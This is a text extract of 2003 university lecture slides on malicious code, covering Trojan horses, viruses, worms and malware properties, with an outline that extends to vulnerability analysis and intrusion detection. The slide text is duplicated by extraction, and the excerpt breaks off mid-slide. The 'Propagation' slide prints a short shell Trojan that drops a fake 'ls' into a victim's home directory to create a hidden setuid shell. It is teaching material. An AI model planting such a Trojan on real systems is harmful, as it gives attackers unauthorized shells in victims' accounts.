November 13, 2003What is Malicious Code?Types of Malicious CodeTrojan HorsePropagationVirusVirus TypesVirus Types/PropertiesSlide 9WormsOther forms of malicious logicWhat do we Do?We can’t detect it: Now what? DetectionDetectionDefenseSlide 16Slide 17Slide 18Vulnerability AnalysisTechniques for Detecting VulnerabilitiesSystem VerificationPenetration TestingTypes/layers of Penetration TestingRed Team Approach Flaw Hypothesis Methodology:Problems with Penetration TestingVulnerability ClassificationExample flaw: xterm logExample: Finger Daemon (exploited by Morris worm)Vulnerability Classification: GeneralizeRISOS:Research Into Secure Operating Systems (Seven Classes)Protection Analysis Model ClassesPA flaw classesNRL TaxonomyNRL Taxonomy (Genesis)NRL Taxonomy: TimeNRL Taxonomy: LocationAslam’s ModelCommon Vulnerabilities and Exposures (cve.mitre.org)Buffer OverflowSlide 41Slide 42Intrusion Detection/ResponseIntrusion DetectionIDS Types: Anomaly DetectionAnomaly Detection: How do we determine normal?IDS Types: Misuse ModelingSpecification ModelingIDS SystemsIDS ArchitectureWhere is the Agent?IDS ProblemIntrusion ResponseContainmentEradicationFollow-UpCourtesy of Professors Chris Clifton & Matt BishopINFSCI 2935: Introduction of Computer Security1November 13, 2003November 13, 2003Malicious CodeMalicious CodeVulnerability AnalysisVulnerability AnalysisIntrusion DetectionIntrusion DetectionLecture 11Lecture 11INFSCI 2935: Introduction to Computer Security 2What is Malicious Code?What is Malicious Code?Set of instructions that causes a security policy Set of instructions that causes a security policy to be violated to be violated Is an unintentional mistake that violates policy malicious code? (Tricked into doing that?)What about “unwanted” code that doesn’t cause a security breach?Generally relies on “legal” operationsGenerally relies on “legal” operationsAuthorized user could perform operations without violating policyMalicious code “mimics” authorized userINFSCI 2935: Introduction to Computer Security 3Types of Malicious CodeTypes of Malicious CodeTrojan HorseTrojan HorseTrick user into executing malicious codeVirusVirusReplicates and inserts itself into fixed set of filesWormWormCopies itself from computer to computerINFSCI 2935: Introduction to Computer Security 4Trojan HorseTrojan HorseProgram with an overt (expected) and covert Program with an overt (expected) and covert (unexpected) effect(unexpected) effectAppears normal/expectedCovert effect violates security policyUser tricked into executing Trojan horseUser tricked into executing Trojan horseExpects (and sees) overt behaviorCovert effect performed with user’s authorizationTrojan horse may replicateTrojan horse may replicateCreate copy on executionSpread to other users/systemsINFSCI 2935: Introduction to Computer Security 5PropagationPropagationPerpetratorcat >/homes/victim/ls <<eofcat >/homes/victim/ls <<eofcp /bin/sh /tmp/.xxshcp /bin/sh /tmp/.xxshchmod u+s,o+x /tmp/.xxshchmod u+s,o+x /tmp/.xxshrm ./lsrm ./lsls $*ls $*eofeofVictimlslsIt is a violation to trick someone into creating a shell that It is a violation to trick someone into creating a shell that is is setuidsetuid to themselves to themselvesHow to replicate this?How to replicate this?INFSCI 2935: Introduction to Computer Security 6VirusVirusSelf-replicating codeSelf-replicating codeA freely propagating Trojan horsesome disagree that it is a Trojan horseInserts itself into another fileAlters normal code with “infected” versionOperates when infected code executedOperates when infected code executedIf spread condition thenFor target filesif not infected then alter to include virusPerform malicious actionExecute normal programINFSCI 2935: Introduction to Computer Security 7Virus TypesVirus TypesBoot Sector Infectors (The Brain Virus)Boot Sector Infectors (The Brain Virus)Problem: How to ensure virus “carrier” executed?Solution: Place in boot sector of diskRun on any bootPropagate by altering boot disk creationLess common with few boots off floppiesExecutable infector (The Jerusalem Virus, Friday 13Executable infector (The Jerusalem Virus, Friday 13thth, , not 1987 )not 1987 )Malicious code placed at beginning of legitimate program (.COM .EXE files)Runs when application runApplication then runs normallyMultipartite virus : boot sector + executable infectorMultipartite virus : boot sector + executable infectorINFSCI 2935: Introduction to Computer Security 8Virus Types/PropertiesVirus Types/PropertiesTerminate and Stay ResidentTerminate and Stay ResidentStays active in memory after application completeAllows infection of previously unknown filesTrap calls that execute a programCan be boot sector infectors or executable infectors (Brain and Jerusalem)Stealth (an executable infector)Stealth (an executable infector)Conceal InfectionTrap read to provide disinfected fileLet execute call infected fileEncrypted virusEncrypted virusPrevents “signature” to detect virus[Deciphering routine, Enciphered virus code, Deciphering Key]PolymorphismPolymorphismChange virus code to something equivalent each time it propagatesINFSCI 2935: Introduction to Computer Security 9Virus Types/PropertiesVirus Types/PropertiesMacro Virus Macro Virus Composed of a sequence of instructions that is interpreted rather than executed directlyInfected “executable” isn’t machine codeRelies on something “executed” inside application dataExample: Melissa virus infected Word 97/98 docsOtherwise similar properties to other virusesOtherwise similar properties to other virusesArchitecture-independentApplication-dependentINFSCI 2935: Introduction to Computer Security 10WormsWormsReplicates from one computer to anotherReplicates from one computer to anotherSelf-replicating: No user action requiredVirus: User performs “normal” actionTrojan horse: User tricked into performing actionCommunicates/spreads using standard Communicates/spreads using standard protocolsprotocolsINFSCI 2935: Introduction to Computer Security 11Other forms of malicious logicOther forms of malicious logicWe’ve discussed how they propagateWe’ve discussed how they propagateBut what do they do?Rabbits/BacteriaRabbits/BacteriaExhaust system resources of some classDenial
View Full Document